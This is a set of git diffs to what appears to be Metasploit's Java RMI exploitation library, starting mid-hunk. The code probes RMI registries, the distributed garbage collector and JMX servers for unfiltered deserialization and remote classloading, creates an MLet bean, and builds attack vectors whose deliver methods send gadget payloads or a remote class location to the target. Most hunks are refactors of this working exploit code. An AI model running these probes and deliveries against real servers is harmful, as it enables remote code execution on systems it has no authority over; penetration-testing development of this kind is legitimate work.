-        # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
+
 
         objects.each do |obj|
           on = obj[1]['name']
@@ -590,7 +624,7 @@ module Msf
           next if @@builtins.include?(on)
           Util.info "Checking object " + on
           begin
-            sendClient(1434350937885235744, [
+            sendClient(R::JMX_INVOKE_HASH, [
               Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', 
                                                                   obj[1]),
               'test',
@@ -646,9 +680,8 @@ module Msf
             'Ljavax/management/ObjectName;', 'name' => 'exploit:name=Mlet')
           args = ['javax.management.loading.MLet', mletname, nil]
 
-          # createMBean(Ljava/lang/String;Ljavax/management/ObjectName;Ljavax/security/auth/Subject;)Ljavax/management/ObjectInstance; 2510753813974665446
           begin
-            o = sendClient(2510753813974665446, args)
+            o = sendClient(R::CREATE_MBEAN_HASH, args)
             Util.info 'Created MLet bean instance'
           rescue Rex::Java::JRMP::JRMPError => e
             root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
@@ -657,8 +690,6 @@ module Msf
             end
             Util.info 'MLet bean instance already exists'
           end
-
-          # invoke(Ljavax/management/ObjectName;Ljava/lang/String;Ljava/rmi/MarshalledObject;[Ljava/lang/String;Ljavax/security/auth/Subject;)Ljava/lang/Object; 1434350937885235744
 
           args = [
             mletname, 
@@ -672,7 +703,7 @@ module Msf
                                                                ['java.lang.String']), 
             nil
           ]
-          sendClient(1434350937885235744, args)
+          sendClient(R::JMX_INVOKE_HASH, args)
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]

--- a/lib/msf/core/exploit/java/serialized/rmi/reference.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/reference.rb
@@ -55,21 +55,22 @@ module Msf
 
       def run
         vectors = []
-        if !@rc.methodHash.nil?
-          methodhash = @rc.methodHash
-          methodid = @rc.methodId
+        if !@rc.method_hash.nil?
+          methodhash = @rc.method_hash
+          methodid = @rc.method_id
           Util.info 'Method/interface hash ' + methodhash.to_s + ' method id ' + methodid.to_s
-          args = @rc.methodBaseArgs
-          argidx = @rc.methodArgIdx
-        elsif !@rc.methodSignature.nil?
+          # TODO: support custom argument list?
+          args = [nil]
+          argidx = 0
+        elsif !@rc.method_signature.nil?
           methodid = -1
-          methodhash = Rex::Java::JRMP::Util.generate_method_hash(@rc.methodSignature)
-          args, argidx = Rex::Java::JRMP::Util.make_dummy_args(@rc.methodSignature)
+          methodhash = Rex::Java::JRMP::Util.generate_method_hash(@rc.method_signature)
+          args, argidx = Rex::Java::JRMP::Util.make_dummy_args(@rc.method_signature)
           if argidx < 0
             Util.error 'Method without a object-valued parameter'
             return vectors
           end
-          Util.info 'Computed method hash ' + methodhash.to_s + ' for ' + @rc.methodSignature
+          Util.info 'Computed method hash ' + methodhash.to_s + ' for ' + @rc.method_signature
           Util.info 'Injecting argument ' + argidx.to_s
         else
           Util.error 'Further testing requires method details...'
@@ -91,8 +92,8 @@ module Msf
           end
         end
 
-        return vectors unless @rc.tryDeser?
-        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+        return vectors unless @rc.try_deser?
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                                                 params: {
           'methodid' => methodid,
           'methodhash' => methodhash,
@@ -104,9 +105,9 @@ module Msf
         strategy.init(ctx)
 
         if ctx.run(strategy)
-          vectors.push(RMICallDeserVector.new(@host, 
-                                              @port, 
-                                              @objid, 
+          vectors.push(RMICallDeserVector.new(@host,
+                                              @port,
+                                              @objid,
                                               ssl: @ssl,
                                               ctx: ctx,
                                               uid: @uid,

--- a/lib/msf/core/exploit/java/serialized/rmi/reference.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/reference.rb
@@ -1,0 +1,146 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class ReferenceProber
+      def initialize(name, ref, reg, connhost, rc)
+        @name = name
+        @reg = reg
+        @ref = ref
+        @host = ref['host']
+        @port = ref['port']
+        @objid = ref['objid']
+        @uid = ref['uid']
+        @ssl = false
+        @legacy = false
+        @rc = rc
+
+        if !ref['factory'].nil? && ref['factory'][0][0] == 'javax.rmi.ssl.SslRMIClientSocketFactory'
+          Util.info 'Exported on a SSL endpoint'
+          @ssl = true
+        end
+
+        begin
+          client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+          r = client.call(@objid, 0, 0, [], uid: @uid)
+          Util.info 'Is a legacy-style object ' + name
+          @legacy = true
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          type = root[0][0]
+
+          if root[1]['detailMessage'] == 'skeleton class not found but required for client version'
+            Util.info 'Is a new-style object ' + name
+          elsif type == 'java.rmi.server.SkeletonMismatchException'
+            Util.info 'Is a custom object ' + name
+          else
+            raise
+          end
+        rescue ::Exception => e
+          if @host != connhost
+            @host = connhost
+            Util.info 'Trying with original host ' + @host + ' port ' + @port.to_s
+            client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+            begin
+              r = client.call(@objid, 0, 0, [], uid: @uid)
+            rescue Rex::Java::JRMP::JRMPError => e
+            rescue ::Exception => e
+              Util.error 'Failed to connect: ' + e.to_s
+              raise
+            end
+            end
+        end
+      end
+
+      def run
+        vectors = []
+        if !@rc.methodHash.nil?
+          methodhash = @rc.methodHash
+          methodid = @rc.methodId
+          Util.info 'Method/interface hash ' + methodhash.to_s + ' method id ' + methodid.to_s
+          args = @rc.methodBaseArgs
+          argidx = @rc.methodArgIdx
+        elsif !@rc.methodSignature.nil?
+          methodid = -1
+          methodhash = Rex::Java::JRMP::Util.generate_method_hash(@rc.methodSignature)
+          args, argidx = Rex::Java::JRMP::Util.make_dummy_args(@rc.methodSignature)
+          if argidx < 0
+            Util.error 'Method without a object-valued parameter'
+            return vectors
+          end
+          Util.info 'Computed method hash ' + methodhash.to_s + ' for ' + @rc.methodSignature
+          Util.info 'Injecting argument ' + argidx.to_s
+        else
+          Util.error 'Further testing requires method details...'
+          return vectors
+        end
+
+        begin
+          send(methodid, methodhash, args)
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.rmi.UnmarshalException'
+            Util.error root[1]['detailMessage']
+            return vectors
+          elsif type == 'java.lang.NullPointerException'
+          elsif type == 'java.rmi.RemoteException'
+          else
+            raise
+          end
+        end
+
+        return vectors unless @rc.tryDeser?
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                                                params: {
+          'methodid' => methodid,
+          'methodhash' => methodhash,
+          'args' => args,
+          'argidx' => argidx
+        })
+
+        strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:test_call))
+        strategy.init(ctx)
+
+        if ctx.run(strategy)
+          vectors.push(RMICallDeserVector.new(@host, 
+                                              @port, 
+                                              @objid, 
+                                              ssl: @ssl,
+                                              ctx: ctx,
+                                              uid: @uid,
+                                              methodId: methodid,
+                                              methodHash: methodhash,
+                                              baseargs: args,
+                                              argidx: argidx))
+        end
+
+        vectors
+      end
+
+      def send(methodid, methodhash, args, location: nil, customreg: nil)
+        reg = @reg
+        reg = customreg unless customreg.nil?
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, reg, location: location, ssl: @ssl)
+        client.call(@objid, methodid, methodhash, args, uid: @uid)
+      end
+
+      def test_call(payl, reg, params)
+        args = params['args']
+        args[params['argidx']] = payl
+        send(params['methodid'], params['methodhash'], args, customreg: reg)
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.IllegalArgumentException'
+            return
+          else
+            return type
+          end
+        end
+
+      def close; end
+    end
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/reference.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/reference.rb
@@ -129,7 +129,8 @@ module Msf
       def test_call(payl, reg, params)
         args = params['args']
         args[params['argidx']] = payl
-        send(params['methodid'], params['methodhash'], args, customreg: reg)
+        begin
+          send(params['methodid'], params['methodhash'], args, customreg: reg)
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP.unwrap_exception(e.ex)
           type = root[0][0]
@@ -139,6 +140,7 @@ module Msf
             return type
           end
         end
+      end
 
       def close; end
     end

--- a/lib/msf/core/exploit/java/serialized/rmi/reference.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/reference.rb
@@ -27,7 +27,7 @@ module Msf
           Util.info 'Is a legacy-style object ' + name
           @legacy = true
         rescue Rex::Java::JRMP::JRMPError => e
-          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]
 
           if root[1]['detailMessage'] == 'skeleton class not found but required for client version'
@@ -79,7 +79,7 @@ module Msf
         begin
           send(methodid, methodhash, args)
         rescue Rex::Java::JRMP::JRMPError => e
-          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]
           if type == 'java.rmi.UnmarshalException'
             Util.error root[1]['detailMessage']
@@ -132,7 +132,7 @@ module Msf
         begin
           send(params['methodid'], params['methodhash'], args, customreg: reg)
         rescue Rex::Java::JRMP::JRMPError => e
-          root = Rex::Java::JRMP.unwrap_exception(e.ex)
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]
           if type == 'java.lang.IllegalArgumentException'
             return

--- a/lib/msf/core/exploit/java/serialized/rmi/reference.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/reference.rb
@@ -55,14 +55,14 @@ module Msf
 
       def run
         vectors = []
-        if !@rc.method_hash.nil?
+        if not @rc.method_hash.nil?
           methodhash = @rc.method_hash
           methodid = @rc.method_id
           Util.info 'Method/interface hash ' + methodhash.to_s + ' method id ' + methodid.to_s
           # TODO: support custom argument list?
           args = [nil]
           argidx = 0
-        elsif !@rc.method_signature.nil?
+        elsif not @rc.method_signature.nil?
           methodid = -1
           methodhash = Rex::Java::JRMP::Util.generate_method_hash(@rc.method_signature)
           args, argidx = Rex::Java::JRMP::Util.make_dummy_args(@rc.method_signature)

--- a/lib/msf/core/exploit/java/serialized/rmi/rmi.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/rmi.rb
@@ -1,0 +1,473 @@
+# -*- coding: binary -*-
+
+require 'rex/ui/text/output/stdio'
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+
+
+
+    class Util
+      @@out = Rex::Ui::Text::Output::Stdio.new
+
+      def self.test_remoteclassloading(host, port, reg, objid, uid, methodid, methodhash, ssl: false)
+        args = [Rex::Java::Serialization::Metamodel::JavaCustomObject.new(
+          'Ldoesnotexist;', 
+          {}, 
+          'typeString' => 'Ldoesnotexist;')]
+
+        client = Rex::Java::JRMP::JRMPClient.new(host, port, reg, location: 'invalid', ssl: ssl)
+        client.call(objid, 
+                    methodid, 
+                    methodhash, 
+                    args, 
+                    uid: uid)
+        raise 'Should not succeed'
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        type = root[0][0]
+
+        if type == 'java.net.MalformedURLException'
+          Util.vuln 'Endpoint appears to allow remote classloading'
+          return true
+        elsif type == 'java.lang.ClassNotFoundException'
+          return false
+        else
+          raise
+        end
+      end
+
+      # TODO: is this an accepted way to produce output?
+      # otherwise, how to get the module instance?
+      def self.info(s)
+        @@out.print_status(s)
+      end
+
+      def self.error(s)
+        @@out.print_error(s)
+      end
+
+      def self.okay(s)
+        @@out.print_good(s)
+      end
+      
+      def self.vuln(s)
+        @@out.print_warning(s)
+      end
+    end
+
+    class RMICallArgumentVector < AttackVector
+      def initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0)
+        @host = host
+        @port = port
+        @ssl = ssl
+        @objId = objId
+        @uid = uid
+        @methodId = methodId
+        @methodHash = methodHash
+        @baseargs = baseargs
+        @argidx = argidx
+        @location = nil
+      end
+
+      def inspect
+        format('RMI call %s:%d objID %d mId %d mHash %d', @host, @port, @objId, @methodId, @methodHash)
+      end
+    end
+
+    class RMICallDeserVector < RMICallArgumentVector
+      def	initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, ctx: nil)
+        super(host, port, objId, uid: uid, methodId: methodId, methodHash: methodHash, ssl: ssl, baseargs: baseargs, argidx: argidx)
+        @ctx = ctx
+      end
+
+      def id
+        ['deser', @host, @port, @ctx.gadgets]
+      end
+
+      def prio
+        10
+      end
+
+      def payload
+        nil
+      end
+
+      def context
+        @ctx
+      end
+
+      def deliver(payl)
+        args = @baseargs.dup
+        args[@argidx] = payl
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
+        client.call(@objId, @methodId, @methodHash, args, uid: @uid)
+      end
+
+      def inspect
+        super + ': Deserialization ' + @ctx.gadgets.to_a.to_s
+      end
+    end
+
+    class RMIClassLoadingVector < RMICallArgumentVector
+      def inspect
+        super + ': Remote Classloading'
+      end
+
+      def id
+        ['classload', @host, @port]
+      end
+
+      def prio
+        -10
+      end
+
+      def deliver(payl)
+        reg = Rex::Java::Serialization::Metamodel::Registry.new(base: File.dirname(__FILE__) + '/')
+        reg.load('model/base-java9.json')
+        reg.load('model/rmi.json')
+        args = @baseargs.dup
+        ts = 'L' + payl[1].tr('.', '/') + ';'
+        args[@argidx] = Rex::Java::Serialization::Metamodel::JavaCustomObject.new(payl[1], {}, 'typeString' => ts)
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, reg, ssl: @ssl, location: payl[0])
+        client.call(@objId, @methodId, @methodHash, args, uid: @uid)
+      end
+    end
+
+    class RMIProber
+      def initialize(host, port, reg, ssl: false, rc: RunConfig.new)
+        @host = host
+        @port = port
+        @reg = reg
+        @ssl = ssl
+        @foundobjects = {}
+        @rc = rc
+      end
+
+      def check_object_exists(objId, uid: nil)
+        begin
+          client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @reg, ssl: @ssl)
+          r = client.call(objId, 0, 0, [], uid: uid)
+          Util.error 'Should not succeed'
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.rmi.server.SkeletonMismatchException'
+            return true
+          elsif type == 'java.rmi.NoSuchObjectException'
+          else
+              if !root[1]['detailMessage'].nil?
+                Util.error type + ':' + root[1]['detailMessage']
+              else
+                Util.error type
+              end
+          end
+        end
+        false
+      end
+      
+      def test_call(payl, reg, params)
+        args = params['args']
+        args[params['argidx']] = payl
+        send(params['objid'], params['methodid'], params['methodhash'], args, customreg: reg)
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.IllegalArgumentException'
+            return
+          else
+            return type
+          end
+        end
+
+      def send(objId, opNum, hash, args, uid: nil, location: nil, customreg: nil)
+        reg = @reg
+        unless customreg.nil?
+          customreg.load('model/rmi.json')
+          reg = customreg
+        end
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, reg, location: location, ssl: @ssl)
+        client.call(objId, opNum, hash, args, uid: uid)
+      end
+
+      def objects
+        @foundobjects
+      end
+
+      def run
+        begin
+          check_object_exists(2)
+        rescue Rex::Java::JRMP::InvalidResponseError => e
+          begin
+            @ssl = true
+            check_object_exists(2)
+            Util.info 'Endpoint appears to use SSL'
+          rescue
+            raise e
+          end
+        end
+
+        vectors = []
+        vectors += run_registry if check_object_exists(0)
+
+        Util.info 'Found Activator, no checks implemented yet' if check_object_exists(1)
+
+        if check_object_exists(2)
+          vectors += run_dgc
+        else
+          Util.error 'No DGC Found'
+        end
+
+        if check_object_exists(4)
+          Util.info 'Found ActivationSystem, no checks implemented yet'
+        end
+
+        vectors
+      end
+      
+      def run_registry
+        vectors = []
+        regobjects = send(0, 1, 4905912898345647071, [])
+        if regobjects.empty?
+          Util.info 'Found RMI Registry with no objects registered'
+        else
+          Util.info 'Found RMI Registry with ' + regobjects.length.to_s + ' registered objects'
+        end
+
+        if regobjects.include?('jmxrmi')
+          Util.info 'Found JMX server, perform further checks later'
+        end
+
+        begin
+          send(0, 2, 4905912898345647071, ['doesnotexist'])
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.rmi.NotBoundException'
+          else
+            Util.error 'Regular lookup failed: ', type, root[1]['detailMessage']
+          end
+        end
+
+        begin
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+                                                                    'protocol' => 'http',
+                                                                    'host' => 'test.invalid',
+                                                                    'hashCode' => -1)
+          send(0, 2, 4905912898345647071, [url])
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.io.InvalidClassException'
+            Util.okay 'Registry lookup() name argument is filtered'
+          elsif type == 'java.lang.ClassCastException'
+            Util.vuln 'Registry lookup() unfiltered'
+
+            if @rc.tryDeser?
+              ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                                                       params: {
+                'objid' => 0,
+                'methodid' => 2,
+                'methodhash' => 4905912898345647071,
+                'args' => [nil],
+                'argidx' => 0
+              })
+              strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:test_call))
+              strategy.init(ctx)
+
+              if ctx.run(strategy)
+                vectors.push(RMICallDeserVector.new(@host, 
+                                                    @port, 
+                                                    0,
+                                                    methodId: 2, 
+                                                    methodHash: 4905912898345647071, 
+                                                    ssl: @ssl,
+                                                    argidx: 0, 
+                                                    ctx: ctx))
+              end
+            end
+          else
+            Util.error 'Registry lookup() failed: ' + type
+          end
+        end
+
+        bound = false
+        begin
+          send(0, 3, 4905912898345647071, ['bindtest', nil])
+          bound = true
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.lang.NullPointerException'
+          elsif type == 'java.rmi.AccessException' || type == 'java.rmi.AlreadyBoundException'
+          else
+            Util.error 'Registry rebind() failed: ' + type
+          end
+        end
+
+        filtered = false
+        noaccess = false
+        begin
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+                                                                    'protocol' => 'http',
+                                                                    'host' => 'test.invalid',
+                                                                    'hashCode' => -1)
+          send(0, 3, 4905912898345647071, ['bindtest', url])
+          bound = true
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.io.InvalidClassException'
+            Util.okay 'Registry rebind() is filtered'
+            filtered = true
+          elsif type == 'java.rmi.AccessException'
+            Util.info 'Bind access check before deserialization'
+            noaccess = true
+          elsif type == 'java.rmi.AlreadyBoundException' || type == 'java.lang.ClassCastException'
+            Util.info 'Bind failed: ' + type
+          else
+            Util.error 'Registry rebind() failed: ' + type
+          end
+        rescue Exception => e
+          Util.error 'Registry rebind() failed: ' + e.to_s
+        end
+
+        begin
+          if !filtered && @rc.tryClassload? &&
+                Util.test_remoteclassloading(@host, 
+                                           @port, 
+                                           @reg, 
+                                           0, 
+                                           0, 
+                                           3, 
+                                           4905912898345647071, 
+                                           ssl: @ssl)
+          vectors.push(RMIClassLoadingVector.new(@host, 
+                                                 @port, 
+                                                 0,
+                                                 methodId: 3,
+                                                 methodHash: 4905912898345647071,
+                                                 ssl: @ssl))
+          end
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+        end
+
+        if @rc.tryDeser? && !noaccess && !filtered
+          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                                                  params: {
+            'objid' => 0,
+            'methodid' => 3,
+            'methodhash' => 4905912898345647071,
+            'args' => ['bindtest', nil],
+            'argidx' => 1
+          })
+          strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:test_call))
+          strategy.init(ctx)
+
+          if ctx.run(strategy)
+            vectors.push(RMICallDeserVector.new(@host, 
+                                                @port, 
+                                                0,
+                                                methodId: 3,
+                                                methodHash: 4905912898345647071, 
+                                                ssl: @ssl,
+                                                baseargs: ['bindtest', nil], 
+                                                argidx: 1, 
+                                                ctx: ctx))
+          end
+        end
+
+        begin
+          send(0, 4, 4905912898345647071, ['bindtest']) if bound
+        rescue => e
+          Util.error 'Registry unbind() for cleanup failed: ' + e.to_s
+        end
+
+        regobjects.each do |name|
+          begin
+            ref = send(0, 2, 4905912898345647071, [name])
+            ref = Rex::Java::JRMP::Util.unwrap_ref(ref)
+            if ref.nil?
+              Util.error 'Invalid reference ' + name
+            else
+              @foundobjects[name] = ref
+            end
+          rescue Rex::Java::JRMP::JRMPError => e
+            root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+            Util.error 'Failed to lookup ' + name + ': ' + root.to_s
+          end
+        end
+
+        vectors
+      end
+
+      def run_dgc
+        vectors = []
+        Util.info 'DGC found'
+        # r = client.call(2,0,17777547820122932803,[]) #DGC.clean(ObjID[], long, VMID, boolean)
+        # r = client.call(2,1,17777547820122932803,[]) #DGC.dirty(ObjID[], long, Lease)
+        begin
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+                                                                    'protocol' => 'http',
+                                                                    'host' => 'test.invalid',
+                                                                    'hashCode' => -1)
+          send(2, 1, 17777547820122932803, [
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/rmi/server/ObjID;', []), 
+            Rex::Java::Serialization::Metamodel::JavaLong.new(0), 
+            url])
+
+        rescue Rex::Java::JRMP::JRMPError => e
+          root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+          type = root[0][0]
+          if type == 'java.io.InvalidClassException'
+            Util.okay 'DGC filters parameter types'
+          elsif type == 'java.lang.ClassCastException'
+            Util.vuln 'DGC does not filter parameters'
+            vectors += run_dgc_deser if @rc.tryDeser?
+          else
+            Util.error 'DGC dirty failed: ' + type
+          end
+        end
+        vectors
+      end
+
+      def run_dgc_deser
+        vectors = []
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+                                                                                params: {
+          'objid' => 2,
+          'methodid' => 1,
+          'methodhash' => 17777547820122932803,
+          'args' => [
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/rmi/server/ObjID;', []),
+            Rex::Java::Serialization::Metamodel::JavaLong.new(0), nil],
+          'argidx' => 2
+        })
+
+        strategy = Rex::Java::Serialization::Probe::ExceptionProbeStrategy.new(method(:test_call))
+        strategy.init(ctx)
+
+        if ctx.run(strategy)
+          args = [
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/rmi/server/ObjID;', []),
+            Rex::Java::Serialization::Metamodel::JavaLong.new(0),
+            nil
+          ]
+          vectors.push(RMICallDeserVector.new(@host, 
+                                              @port, 
+                                              2,
+                                              methodId: 1, 
+                                              methodHash: 17777547820122932803, 
+                                              ssl: @ssl,
+                                              baseargs: args,
+                                              argidx: 2, 
+                                              ctx: ctx))
+        end
+        vectors
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/rmi.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/rmi.rb
@@ -5,23 +5,20 @@ require 'rex/ui/text/output/stdio'
 module Msf
   module Exploit::Java::Serialized::RMI
 
-
-
-
     class Util
       @@out = Rex::Ui::Text::Output::Stdio.new
 
       def self.test_remoteclassloading(host, port, reg, objid, uid, methodid, methodhash, ssl: false)
         args = [Rex::Java::Serialization::Metamodel::JavaCustomObject.new(
-          'Ldoesnotexist;', 
-          {}, 
+          'Ldoesnotexist;',
+          {},
           'typeString' => 'Ldoesnotexist;')]
 
         client = Rex::Java::JRMP::JRMPClient.new(host, port, reg, location: 'invalid', ssl: ssl)
-        client.call(objid, 
-                    methodid, 
-                    methodhash, 
-                    args, 
+        client.call(objid,
+                    methodid,
+                    methodhash,
+                    args,
                     uid: uid)
         raise 'Should not succeed'
       rescue Rex::Java::JRMP::JRMPError => e
@@ -51,7 +48,7 @@ module Msf
       def self.okay(s)
         @@out.print_good(s)
       end
-      
+
       def self.vuln(s)
         @@out.print_warning(s)
       end
@@ -77,7 +74,7 @@ module Msf
     end
 
     class RMICallDeserVector < RMICallArgumentVector
-      def	initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, ctx: nil)
+      def initialize(host, port, objId, uid: nil, methodId: -1, methodHash: 0, ssl: false, baseargs: [nil], argidx: 0, ctx: nil)
         super(host, port, objId, uid: uid, methodId: methodId, methodHash: methodHash, ssl: ssl, baseargs: baseargs, argidx: argidx)
         @ctx = ctx
       end
@@ -166,7 +163,7 @@ module Msf
         end
         false
       end
-      
+
       def test_call(payl, reg, params)
         args = params['args']
         args[params['argidx']] = payl
@@ -225,7 +222,7 @@ module Msf
 
         vectors
       end
-      
+
       def run_registry
         vectors = []
         regobjects = send(0, 1, 4905912898345647071, [])
@@ -251,7 +248,7 @@ module Msf
         end
 
         begin
-          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;',
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
@@ -259,13 +256,14 @@ module Msf
         rescue Rex::Java::JRMP::JRMPError => e
           root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
           type = root[0][0]
+          msg = root[1]["detailMessage"]
           if type == 'java.io.InvalidClassException'
             Util.okay 'Registry lookup() name argument is filtered'
-          elsif type == 'java.lang.ClassCastException'
+          elsif type == 'java.lang.ClassCastException' and msg != 'Cannot cast an object to java.lang.String'
             Util.vuln 'Registry lookup() unfiltered'
 
-            if @rc.tryDeser?
-              ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+            if @rc.try_deser?
+              ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                                                        params: {
                 'objid' => 0,
                 'methodid' => 2,
@@ -277,13 +275,13 @@ module Msf
               strategy.init(ctx)
 
               if ctx.run(strategy)
-                vectors.push(RMICallDeserVector.new(@host, 
-                                                    @port, 
+                vectors.push(RMICallDeserVector.new(@host,
+                                                    @port,
                                                     0,
-                                                    methodId: 2, 
-                                                    methodHash: 4905912898345647071, 
+                                                    methodId: 2,
+                                                    methodHash: 4905912898345647071,
                                                     ssl: @ssl,
-                                                    argidx: 0, 
+                                                    argidx: 0,
                                                     ctx: ctx))
               end
             end
@@ -309,7 +307,7 @@ module Msf
         filtered = false
         noaccess = false
         begin
-          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;',
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
@@ -334,17 +332,17 @@ module Msf
         end
 
         begin
-          if !filtered && @rc.tryClassload? &&
-                Util.test_remoteclassloading(@host, 
-                                           @port, 
-                                           @reg, 
-                                           0, 
-                                           0, 
-                                           3, 
-                                           4905912898345647071, 
+          if !filtered && @rc.try_classload? &&
+                Util.test_remoteclassloading(@host,
+                                           @port,
+                                           @reg,
+                                           0,
+                                           0,
+                                           3,
+                                           4905912898345647071,
                                            ssl: @ssl)
-          vectors.push(RMIClassLoadingVector.new(@host, 
-                                                 @port, 
+          vectors.push(RMIClassLoadingVector.new(@host,
+                                                 @port,
                                                  0,
                                                  methodId: 3,
                                                  methodHash: 4905912898345647071,
@@ -355,8 +353,8 @@ module Msf
           type = root[0][0]
         end
 
-        if @rc.tryDeser? && !noaccess && !filtered
-          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+        if @rc.try_deser? && !noaccess && !filtered
+          ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                                                   params: {
             'objid' => 0,
             'methodid' => 3,
@@ -368,14 +366,14 @@ module Msf
           strategy.init(ctx)
 
           if ctx.run(strategy)
-            vectors.push(RMICallDeserVector.new(@host, 
-                                                @port, 
+            vectors.push(RMICallDeserVector.new(@host,
+                                                @port,
                                                 0,
                                                 methodId: 3,
-                                                methodHash: 4905912898345647071, 
+                                                methodHash: 4905912898345647071,
                                                 ssl: @ssl,
-                                                baseargs: ['bindtest', nil], 
-                                                argidx: 1, 
+                                                baseargs: ['bindtest', nil],
+                                                argidx: 1,
                                                 ctx: ctx))
           end
         end
@@ -410,13 +408,13 @@ module Msf
         # r = client.call(2,0,17777547820122932803,[]) #DGC.clean(ObjID[], long, VMID, boolean)
         # r = client.call(2,1,17777547820122932803,[]) #DGC.dirty(ObjID[], long, Lease)
         begin
-          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;', 
+          url = Rex::Java::Serialization::Metamodel::JavaObject.new('Ljava/net/URL;',
                                                                     'protocol' => 'http',
                                                                     'host' => 'test.invalid',
                                                                     'hashCode' => -1)
